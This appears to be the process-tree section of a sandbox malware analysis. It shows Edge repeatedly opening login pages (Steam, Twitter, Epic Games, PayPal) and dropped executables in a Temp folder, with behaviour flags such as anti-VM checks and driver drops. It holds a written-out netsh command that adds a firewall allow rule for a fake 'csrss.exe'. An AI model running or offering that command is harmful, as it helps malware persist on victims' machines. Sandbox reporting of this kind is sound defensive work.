"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,18045083208915431315,7075146140349824465,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
4⤵
PID:5664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
3⤵
PID:708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff70af46f8,0x7fff70af4708,0x7fff70af4718
4⤵
PID:912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,12733966860115145280,2124050139221926310,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
4⤵
PID:5988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,12733966860115145280,2124050139221926310,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
4⤵
PID:5980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4616

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff70af46f8,0x7fff70af4708,0x7fff70af4718
4⤵
PID:4488

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:8
4⤵
PID:5332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
4⤵
PID:5504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
4⤵
PID:5496

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3
4⤵
PID:5320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
4⤵
PID:5312

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2140 /prefetch:1
4⤵
PID:6172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:1
4⤵
PID:6744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
4⤵
PID:6444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1
4⤵
PID:7264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
4⤵
PID:7624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
4⤵
PID:8068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
4⤵
PID:7948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:1
4⤵
PID:7388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
4⤵
PID:7608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7100 /prefetch:1
4⤵
PID:6456

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7076 /prefetch:1
4⤵
PID:7828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7576 /prefetch:1
4⤵
PID:7792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7384 /prefetch:1
4⤵
PID:5772

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3860 /prefetch:8
4⤵
PID:1864

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,946905408189655826,11483091623124682752,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3860 /prefetch:8
4⤵
PID:5636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
3⤵
PID:4856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff70af46f8,0x7fff70af4708,0x7fff70af4718
4⤵
PID:1500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,4263526382010813649,5715535099250081976,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
4⤵
PID:6612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,4263526382010813649,5715535099250081976,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:2
4⤵
PID:6564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
3⤵
PID:676

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff70af46f8,0x7fff70af4708,0x7fff70af4718
4⤵
PID:2384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,511856379912538769,7497970601529780389,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
4⤵
PID:6580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,511856379912538769,7497970601529780389,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
4⤵
PID:6572

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
3⤵
PID:3116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff70af46f8,0x7fff70af4708,0x7fff70af4718
4⤵
PID:3020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,10342526608513136114,13519127010709335994,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
4⤵
PID:5380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,10342526608513136114,13519127010709335994,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
4⤵
PID:5372

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
3⤵
PID:1792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff70af46f8,0x7fff70af4708,0x7fff70af4718
4⤵
PID:4280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,3016114480021618341,6136562929928129518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
4⤵
PID:5684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,3016114480021618341,6136562929928129518,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
4⤵
PID:5636

C:\Users\Admin\AppData\Local\Temp\3611.exe
C:\Users\Admin\AppData\Local\Temp\3611.exe
2⤵
- Executes dropped EXE
PID:1704

C:\Users\Admin\AppData\Local\Temp\3CB9.exe
C:\Users\Admin\AppData\Local\Temp\3CB9.exe
2⤵
- Executes dropped EXE
PID:3324

C:\Users\Admin\AppData\Local\Temp\5B8D.exe
C:\Users\Admin\AppData\Local\Temp\5B8D.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5144

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
3⤵
- Executes dropped EXE
PID:8112

C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:7172

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6504

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7132

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
3⤵
- Executes dropped EXE
PID:8172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
PID:7820

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
4⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Modifies data under HKEY_USERS
PID:2132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5660

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:4924

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:7992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 992
4⤵
- Program crash
PID:3532

C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2316

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
4⤵
- Executes dropped EXE
PID:3240

C:\Users\Admin\AppData\Local\Temp\is-KTBVR.tmp\is-KPRFU.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KTBVR.tmp\is-KPRFU.tmp" /SL4 $60214 "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" 5484136 79360
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:5264

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" helpmsg 3
6⤵
PID:1432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 helpmsg 3
7⤵
PID:3348

C:\Program Files (x86)\ABuster\ABuster.exe
"C:\Program Files (x86)\ABuster\ABuster.exe" -i
6⤵
- Executes dropped EXE
PID:5608

C:\Program Files (x86)\ABuster\ABuster.exe
"C:\Program Files (x86)\ABuster\ABuster.exe" -s
6⤵
- Executes dropped EXE
PID:6108

C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:7688

C:\Users\Admin\AppData\Local\Temp\6542.exe
C:\Users\Admin\AppData\Local\Temp\6542.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:6384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff70af46f8,0x7fff70af4708,0x7fff70af4718
4⤵
PID:8124

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
4⤵
PID:7672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
4⤵
PID:7040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
4⤵
PID:1260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,16735957318341785631,7248798037812744021,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
4⤵
PID:4284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
